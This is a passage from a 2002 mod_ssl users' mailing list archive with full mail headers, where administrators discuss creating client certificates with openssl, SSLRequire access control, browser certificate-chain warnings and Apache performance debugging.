ideas on this. 8-) Thanks in advance. Sean Staats Systems Administrator Questia Media, Inc. x2593 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 4 09:58:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA10153; Thu, 4 Apr 2002 09:57:27 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA10114; Thu, 4 Apr 2002 09:56:56 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 654924CE744; Thu, 4 Apr 2002 09:56:54 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g347l5x45206; Thu, 4 Apr 2002 09:47:05 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mx0.gmx.net id BAA17019; Thu, 4 Apr 2002 01:43:07 +0200 (MET DST) From: jmos@gmx.net Received: (qmail 13919 invoked by uid 0); 3 Apr 2002 23:43:05 -0000 Date: Thu, 4 Apr 2002 01:43:05 +0200 (MEST) To: modssl-users@modssl.org MIME-Version: 1.0 Subject: Re: Creating client certificates ? X-Priority: 3 (Normal) X-Authenticated-Sender: #0002586498@gmx.net X-Authenticated-IP: [213.7.28.162] Message-ID: <17146.1017877385@www5.gmx.net> X-Mailer: WWW-Mail 1.5 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jmos@gmx.net X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users jmos@gmx.net wrote: > > Hello modssl users ! > > I managed to set up an ssl aware web server. > Although I searched the web and also the list > archive I haven't been able to create a client > certificate which is signed by my own CA for > client authentication. > > Could someone describe the process of creating > such a certificate in detail ? Thank you Owen for your answer but you misunderstood my question. And you Maik misunderstood my question, too. I, of course, read the FAQ and all the other available docs but they say nothing about creating client (!) certificates ! The process of creating a server certificate is sufficiently documented in the FAQ and it was no problem for me to create it. My question is: How can I create client (!) certificates for client authentication to the server and not server certificates ?! Anyone ? -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 4 09:58:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA10156; Thu, 4 Apr 2002 09:57:29 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA10109; Thu, 4 Apr 2002 09:56:55 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 53D2D4CE73A; Thu, 4 Apr 2002 09:56:54 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g347kpT45188; Thu, 4 Apr 2002 09:46:51 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mx18.nameplanet.com id XAA06834; Wed, 3 Apr 2002 23:27:44 +0200 (MET DST) From: haldor@husby.as Received: 3 Apr 2002 20:27:43 -0000 Received: from unknown (HELO www3.nameplanet.com) (192.168.2.43) by mx18 with SMTP; 3 Apr 2002 20:27:43 -0000 Received: (qmail 18082 invoked by uid 400); 3 Apr 2002 20:27:43 -0000 Date: 3 Apr 2002 20:27:43 -0000 Message-ID: <20020403202743.18081.qmail@www3.nameplanet.com> To: modssl-users@modssl.org MIME-Version: 1.0 Subject: Problems with Client authentication and access control Content-Type: text/plain Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: haldor@husby.as X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello. I have successfuly done Client Authentication using client certificates with apache-openssl-modssl. SSLVerifyClient none SSLVerifyClient require SSLVerifyDepth 5 #SSLCACertificateFile conf/ssl.crt/ca.crt #SSLCACertificatePath conf/ssl.crt SSLOptions +FakeBasicAuth SSLRequireSSL SSLRequire %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." and \ %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} The definition of SSLCACertificateFile and SSLCACertificatePath are above in the httpd.conf file. When i try to connect to https:/www.xxx.xx/secure the server asks for the certificate, validates it and show index.html in the secure directory. Everything seem to work fine. But when i do a http://www.xxx.xx/secure I can still see the index.html. According to my understanding the index.html in the secure directory should not be shown. Can anyone help me with this? Is there anything more i should do to prevent access from http on the secure directory? Thanx Haldor Husby. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 4 10:13:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA11804; Thu, 4 Apr 2002 10:12:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id KAA11754; Thu, 4 Apr 2002 10:11:44 +0200 (MET DST) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id DEF65BD2A; Thu, 4 Apr 2002 10:11:07 +0200 (CEST) Date: Thu, 4 Apr 2002 10:11:07 +0200 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Creating client certificates ? Message-ID: <20020404081107.GB4302@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <17146.1017877385@www5.gmx.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <17146.1017877385@www5.gmx.net> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Apr 04, 2002 at 01:43:05AM +0200, jmos@gmx.net wrote: > My question is: How can I create client (!) certificates for > client authentication to the server and not > server certificates ?! There is a nice example script called cca.sh in the mod_ssl tarball - as pkg.contrib/cca.sh or availabe online via cvsweb: http://www.modssl.org/source/cvs/exp/mod_ssl/pkg.mod_ssl/pkg.contrib/cca.sh?rev=1.6 vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 4 11:41:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA16547; Thu, 4 Apr 2002 11:40:09 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from dukas.upc.es id LAA16527; Thu, 4 Apr 2002 11:39:35 +0200 (MET DST) Received: from parra.upc.es (parra.upc.es [147.83.36.80]) by dukas.upc.es (8.12.1/8.12.1) with ESMTP id g349dRXG029195 for ; Thu, 4 Apr 2002 11:39:34 +0200 (MET DST) Received: from localhost (localhost [127.0.0.1]) by parra.upc.es (Postfix) with ESMTP id 813B7619EB for ; Thu, 4 Apr 2002 11:39:21 +0200 (MET DST) Received: from etsetb.upc.es (dalia.upc.es [147.83.36.36]) by parra.upc.es (Postfix) with ESMTP id 7B229619EA for ; Thu, 4 Apr 2002 11:39:16 +0200 (MET DST) Message-ID: <3CAC1107.6BEB85EE@etsetb.upc.es> Date: Thu, 04 Apr 2002 10:38:31 +0200 From: Sergi Mayordomo X-Mailer: Mozilla 4.78 [es] (X11; U; Linux 2.4.7-10 i586) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Nowhere talks about RPMS installation. Is it possible? References: <3CAAEA6B.C44A9311@etsetb.upc.es> <3CAAF40C.49B493D5@bourse.ch> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-10 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Sergi Mayordomo X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks for your answers, Andrew Lietzow and Owen Boyle. I have discover that my virtualhost was defined wrongly. (On the port 433!!!!!!!!!!!) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 4 12:25:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA19577; Thu, 4 Apr 2002 12:24:18 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA19558; Thu, 4 Apr 2002 12:23:48 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id E39884CE73A; Thu, 4 Apr 2002 12:23:47 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g349SD246987; Thu, 4 Apr 2002 11:28:13 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mx17.nameplanet.com id LAA15577; Thu, 4 Apr 2002 11:18:48 +0200 (MET DST) From: haldor@husby.as Received: 4 Apr 2002 09:11:08 -0000 Received: from unknown (HELO www3.nameplanet.com) (192.168.2.43) by mx17 with SMTP; 4 Apr 2002 09:11:08 -0000 Received: (qmail 27101 invoked by uid 400); 4 Apr 2002 09:11:08 -0000 Date: 4 Apr 2002 09:11:08 -0000 Message-ID: <20020404091108.27100.qmail@www3.nameplanet.com> To: modssl-users@modssl.org MIME-Version: 1.0 Subject: Re: Creating client certificates ? Content-Type: text/plain Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: haldor@husby.as X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users here is what i did to generate client sertificates. be aware of the clientakey.pem and clienta.pem are two different files. 1. openssl req -new -out clienta.csr -keyout clientakey.pem Enter the details for the certificate, i.e common name being the client/employee, \ "Joe Bloggs". 2. openssl x509 -req -in clienta.csr -out clienta.pem -CA YOUR_SERVERS_CERTIFICATE \ -CAkey YOUR_SERVERS_PRIVATE_KEY -CAcreateserial -days 365 -outform PEM 3. openssl pkcs12 -export -in clienta.pem -out clienta.p12 -inkey clientakey.pem \ -name "Joe Bloggs" Distribute clienta.p12 (rename clienta.p12 to Joe_Bloggs.p12) to client/employee. Haldor. On Thu, 4 Apr 2002 01:43:05 +0200 (MEST) jmos@gmx.net wrote: >jmos@gmx.net wrote: >> >> Hello modssl users ! >> >> I managed to set up an ssl aware web server. >> Although I searched the web and also the list >> archive I haven't been able to create a client >> certificate which is signed by my own CA for >> client authentication. >> >> Could someone describe the process of creating >> such a certificate in detail ? > > >Thank you Owen for your answer but you misunderstood >my question. >And you Maik misunderstood my question, too. >I, of course, read the FAQ and all the other available docs >but they say nothing about creating client (!) certificates ! >The process of creating a server certificate is sufficiently >documented in the FAQ and it was no problem for me to >create it. > >My question is: How can I create client (!) certificates for > client authentication to the server and not > server certificates ?! > >Anyone ? > >-- >GMX - Die Kommunikationsplattform im Internet. >http://www.gmx.net >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 4 12:25:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA19588; Thu, 4 Apr 2002 12:24:23 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA19562; Thu, 4 Apr 2002 12:23:49 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 2C0FB4CE74C; Thu, 4 Apr 2002 12:23:48 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g349S9s46975; Thu, 4 Apr 2002 11:28:09 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns.designlinks.net id KAA14401; Thu, 4 Apr 2002 10:59:46 +0200 (MET DST) Received: from ayakub (host213-122-246-212.in-addr.btopenworld.com [213.122.246.212]) by ns.designlinks.net (8.10.2/8.10.2) with SMTP id g3499Nc00391 for ; Thu, 4 Apr 2002 10:09:23 +0100 Received: by localhost with Microsoft MAPI; Thu, 4 Apr 2002 10:02:17 +0100 Message-ID: <01C1DBBF.CD3825D0.shiraz.esat@designlinks.net> From: Shiraz Esat To: "'modssl-users@modssl.org'" Subject: RE: Creating client certificates ? Date: Thu, 4 Apr 2002 10:02:16 +0100 X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01C1DBBF.CD39AC70" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiraz Esat X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users ------ =_NextPart_000_01C1DBBF.CD39AC70 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit When a client browser reaches an SSL-secured page, the browser checks to see whether the 'server' certificate is trusted. In Internet Explorer 5.5, you can view a list of trusted certificates from: (Menu) Tools|Internet Options... -> Content TAB | Certificates.. BUTTON. You should be able to view all installed certificates. These certificates have either been pre-installed, or installed when visiting an SSL-site and agreeing to download. This is how a 'client' certificate exists. An easy way of getting hold of the 'client certificate' that you yourself have signed (mine is attached) is by going to your own site and agreeing to trust your site (!). The certificate would then be installed on your machine. Then view all installed certificates (explained above for IE), and Export the certificate. Doing all this allows you to pass on a copy of your certificate to someone, and tell them to Import it into their trusted list. I feel it's all a bit unneccesary, but now you should be "able to create a client certificate which is signed by my own CA for client authentication." ! Shiraz -----Original Message----- From: jmos@gmx.net [SMTP:jmos@gmx.net] Sent: Thursday, April 04, 2002 12:43 AM To: modssl-users@modssl.org Subject: Re: Creating client certificates ? jmos@gmx.net wrote: > > Hello modssl users ! > > I managed to set up an ssl aware web server. > Although I searched the web and also the list > archive I haven't been able to create a client > certificate which is signed by my own CA for > client authentication. > > Could someone describe the process of creating > such a certificate in detail ? Thank you Owen for your answer but you misunderstood my question. And you Maik misunderstood my question, too. I, of course, read the FAQ and all the other available docs but they say nothing about creating client (!) certificates ! The process of creating a server certificate is sufficiently documented in the FAQ and it was no problem for me to create it. My question is: How can I create client (!) certificates for client authentication to the server and not server certificates ?! Anyone ? -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ------ =_NextPart_000_01C1DBBF.CD39AC70 Content-Type: application/x-x509-ca-cert; name="designlinks.cer" Content-Transfer-Encoding: base64 MIICoTCCAgoCAQAwDQYJKoZIhvcNAQEEBQAwgZgxCzAJBgNVBAYTAlVLMRcwFQYDVQQIEw5MZWlj ZXN0ZXJzaGlyZTESMBAGA1UEBxMJTGVpY2VzdGVyMRQwEgYDVQQKEwtEZXNpZ25MaW5rczEcMBoG A1UEAxMTd3d3LmRlc2lnbmxpbmtzLm5ldDEoMCYGCSqGSIb3DQEJARYZYWRtaW5Ad3d3LmRlc2ln bmxpbmtzLm5ldDAeFw0wMjAzMTIxMDUzNDNaFw0wNDAzMTExMDUzNDNaMIGYMQswCQYDVQQGEwJV SzEXMBUGA1UECBMOTGVpY2VzdGVyc2hpcmUxEjAQBgNVBAcTCUxlaWNlc3RlcjEUMBIGA1UEChML RGVzaWduTGlua3MxHDAaBgNVBAMTE3d3dy5kZXNpZ25saW5rcy5uZXQxKDAmBgkqhkiG9w0BCQEW GWFkbWluQHd3dy5kZXNpZ25saW5rcy5uZXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAL30 Oj39ROe9dyvSdNHanTspDA2xt6cF6LZNvl1G1UQ46e/YpJt1W1gx4JYr0h9LHuU9KVZpYV7CzhdX qP30/CFoJrt8NiB5RiHGPZoxyqwjo9lV8Sw4Ab04Na960ymwMbkB/D3Fp6xA+aQBJLmmT8j56ySU laQueTZk3vEdRfhFAgMBAAEwDQYJKoZIhvcNAQEEBQADgYEAW2Q+fq6+qu454hwtfEAjsnicyD3v oKBLy2LAvljIbRzOFlZusgncwPwVeWH6+5X1ufLzU8QG3O0d0VIOie2IX/OHAEOe40MXOmrWfOPv petdY5TneqT7I4fUOg8C6qGhfLXmw+3Fn39YI7ys+mf9jpLlskg4XWTsqF6DxfHuuWg= ------ =_NextPart_000_01C1DBBF.CD39AC70-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 4 12:29:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA19894; Thu, 4 Apr 2002 12:28:22 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from dukas.upc.es id MAA19872; Thu, 4 Apr 2002 12:28:02 +0200 (MET DST) Received: from parra.upc.es (parra.upc.es [147.83.36.80]) by dukas.upc.es (8.12.1/8.12.1) with ESMTP id g34AS0XG015739 for ; Thu, 4 Apr 2002 12:28:01 +0200 (MET DST) Received: from localhost (localhost [127.0.0.1]) by parra.upc.es (Postfix) with ESMTP id 778C9619EB for ; Thu, 4 Apr 2002 12:27:55 +0200 (MET DST) Received: from etsetb.upc.es (dalia.upc.es [147.83.36.36]) by parra.upc.es (Postfix) with ESMTP id 4EE0B619EA for ; Thu, 4 Apr 2002 12:27:52 +0200 (MET DST) Message-ID: <3CAC1C6A.4964CA80@etsetb.upc.es> Date: Thu, 04 Apr 2002 11:27:06 +0200 From: Sergi Mayordomo X-Mailer: Mozilla 4.78 [es] (X11; U; Linux 2.4.7-10 i586) X-Accept-Language: en MIME-Version: 1.0 To: modssl Subject: a perl directive don't work with ssl Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-10 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Sergi Mayordomo X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users What have i to put into the virtual host $RewriteEngine="on"; unless ($?) { $RewriteRule = '^/(img/.*) http://barra.es/$1'; push @RewriteRule , ('^/(pdf/.*) http://barra.es/$1'); push @RewriteRule , ('^/(docs/.*) http://barra.es/$1'); } push @RewriteRule , ('^/(dat/.*) /serveis/$1'); ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 4 18:17:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA07878; Thu, 4 Apr 2002 18:16:21 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ginsberg.uol.com.br id SAA07859; Thu, 4 Apr 2002 18:15:36 +0200 (MET DST) Received: from denao ([192.168.209.103]) by ginsberg.uol.com.br (8.9.1/8.9.1) with ESMTP id NAA12437 for ; Thu, 4 Apr 2002 13:14:32 -0300 (BRT) Subject: Re: Performance Issue From: "Denis A.V.Jr." To: modssl-users@modssl.org In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Evolution/0.15 (Preview Release) Date: 04 Apr 2002 13:09:11 -0300 Message-Id: <1017936554.4430.42.camel@blue0x> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Denis A.V.Jr." X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Definetly, Cliff. I'll send it to you ASAP. Thank you. On Mon, 2002-04-01 at 17:48, Cliff Woolley wrote: > On Mon, 1 Apr 2002, Alex wrote: > > > I am experiencing exactly the same issue after upgrade of couple of > > servers in our web-farm from Sol.2.6 to Solaris 8 (running on Sun Enterprise). > > We are using Apache 1.3.9 on Solaris 2.6, Apache 1.3.23/mod_ssl 2.8.7 on > > Solaris 8. > > > > Please, let me know if you find something that explains such a high load > > and a way to eliminate it. > > As I mentioned the last time (and never got a response): > > To help track this down, can you do a before-and-after run of the > following: > > truss -c > lockstat -CP sleep 5 > > and email the outputs of both from the old version and the new version to > me? > > Thanks, > Cliff > > -------------------------------------------------------------- > Cliff Woolley > jwoolley@apache.org > Apache HTTP Server Project > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- Denis A.V.Jr. - denao@uol.com.br Systems Engineer - ICQ 2524962 Universo Online perl -e 'print "computers are like air-conditioners: they stop working when you open windows ", pack("c*",hex "3A",sqrt(2025),(unpack(c,"=")-20),10);' ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Apr 4 20:33:35 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA14196; Thu, 4 Apr 2002 20:32:22 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id UAA14146; Thu, 4 Apr 2002 20:31:26 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id B1EE64CE74C; Thu, 4 Apr 2002 20:31:25 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g34IOK254896; Thu, 4 Apr 2002 20:24:20 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cer31mx.cirso.fr id QAA03051; Thu, 4 Apr 2002 16:54:46 +0200 (MET DST) Received: from cer31mx.cirso.fr (localhost [127.0.0.1]) by cer31mx.cirso.fr (8.11.1/8.11.1) with ESMTP id g34Eohm00388 for ; Thu, 4 Apr 2002 16:50:43 +0200 Received: from contact31.cirso.fr (contact.cirso.fr [213.41.82.11]) by cer31mx.cirso.fr (8.11.1/8.11.1) with SMTP id g34Eog000381 for ; Thu, 4 Apr 2002 16:50:43 +0200 Received: by contact31.cirso.fr(Lotus SMTP MTA v4.6.7 (934.1 12-30-1999)) id C1256B91.00518EC2 ; Thu, 4 Apr 2002 16:50:49 +0200 X-Lotus-FromDomain: CER59@CER31@URSSAF From: "Arnaud De Timmerman" To: modssl-users@modssl.org Message-ID: Date: Thu, 4 Apr 2002 16:35:59 +0200 Subject: test installed certificates Mime-Version: 1.0 Content-type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Arnaud De Timmerman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users hi, i don't know if this list is the best for my question, my deepest apologies if not is there a way to know thanks to apache and/or modssl if a given root ca is installed on the client side (browser) ? what i want to avoid is a page like : ******************************* click here to install our root CA ___________________ ******************************* if the given file is already installed thanks all ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 03:05:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA05698; Fri, 5 Apr 2002 03:04:13 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id DAA05686; Fri, 5 Apr 2002 03:03:48 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 8BBE04CE617; Fri, 5 Apr 2002 03:03:46 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g34KAuO57538; Thu, 4 Apr 2002 22:10:56 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ntserver.onerev.com id VAA19704; Thu, 4 Apr 2002 21:53:58 +0200 (MET DST) Received: by NTSERVER with Internet Mail Service (5.5.2655.55) id ; Thu, 4 Apr 2002 11:54:41 -0800 Message-ID: From: Mahesh Mahalingam To: "'modssl-users@modssl.org'" Subject: Apache Server:Https mode Date: Thu, 4 Apr 2002 11:54:40 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.55) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mahesh Mahalingam X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I have successfully installed apache with mod_ssl setup. But i was not able to get the page in https mode. (mod_ssl.c is also enabled.)How can i run this in https mode with a security certificate. Mahesh Mahalingam ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 06:02:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA13263; Fri, 5 Apr 2002 06:02:06 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from lists.travelguides.com id GAA13183; Fri, 5 Apr 2002 06:00:30 +0200 (MET DST) Received: (qmail 16957 invoked from network); 5 Apr 2002 02:10:17 -0000 Received: from unknown (HELO cliff) (66.127.229.58) by 0 with SMTP; 5 Apr 2002 02:10:17 -0000 Message-ID: <003d01c1dc59$0f54cba0$3ae57f42@cliff> From: "Cliff" To: Subject: Question about errors browsers give on non-validated keys Date: Thu, 4 Apr 2002 20:19:20 -0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_003A_01C1DC16.00F14E50" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Cliff" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_003A_01C1DC16.00F14E50 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, my work bought a certificate from thawte, and it is for = travelguides.com. I installed the cert and modssl is working with no = problems, except when I click on a link that goes to a secure (https) = part of the site, different browsers pop up this message: Netscape: travelguides.com is a site that uses encryption to protect = transmitted information. However, Netscape does not recognize the authority who signed its Certificate. Although Netscape does not recognize the signer of this Certificate, you = may decide to accept it anyway so that you can connect to and exchange information with this site. This assistant will help you decide whether or not you wish to accept = this Certificate and to what extent. Opera: This sites certificate chain is incomplete and the signer is not = verified, continue? IE: says something about it is sign but on the wrong domain. My question is, it is signed for travelguides.com but I have tried = putting the https listening on secure.travelguides.com and just regular = travelguides.com and I still get this prompt. How do I get rid of it? = Thanks ------=_NextPart_000_003A_01C1DC16.00F14E50 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi, my work bought a certificate from = thawte, and=20 it is for travelguides.com. I installed the cert and modssl is working = with no=20 problems, except when I click on a link that goes to a secure (https) = part of=20 the site, different browsers pop up this message:
 
Netscape: travelguides.com is a site = that uses=20 encryption to protect transmitted
information. However, Netscape does = not=20 recognize the authority who
signed its Certificate.
 
Although Netscape does not recognize = the signer of=20 this Certificate, you may
decide to accept it anyway so that you can = connect=20 to and exchange
information with this site.
 
This assistant will help you decide = whether or not=20 you wish to accept this
Certificate and to what extent.
 
 
 
Opera: This sites certificate chain is = incomplete=20 and the signer is not verified, continue?
 
IE: says something about it is sign but = on the=20 wrong domain.
 
 
 
 
 
My question is, it is signed for = travelguides.com=20 but I have tried putting the https listening on secure.travelguides.com = and just=20 regular travelguides.com and I still get this prompt. How do I get rid = of it?=20 Thanks
------=_NextPart_000_003A_01C1DC16.00F14E50-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Apr 5 09:24:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA23065; Fri, 5 Apr 2002 09:23:19 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA22959; Fri, 5 Apr 2002 09:22:14 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 7ABFF4CE6E0; Fri, 5 Apr 2002 09:22:13 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g356RNp66026; Fri, 5 Apr 2002 08:27:23 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ara.cwie.net id WAA22908; Thu, 4 Apr 2002 22:56:17 +0200 (MET DST) Received: from cavecreek.net (ovi1.cwie.net [64.38.194.116]) by ara.cwie.net (8.12.2/8.12.2) with ESMTP id g34Ku6ql065866 for ; Thu, 4 Apr 2002 13:56:06 -0700 (MST) Message-ID: <3CACBEC3.B960A655@cavecreek.net> Date: Thu, 04 Apr 2002 13:59:47 -0700 From: Ovidiu Semenea X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; 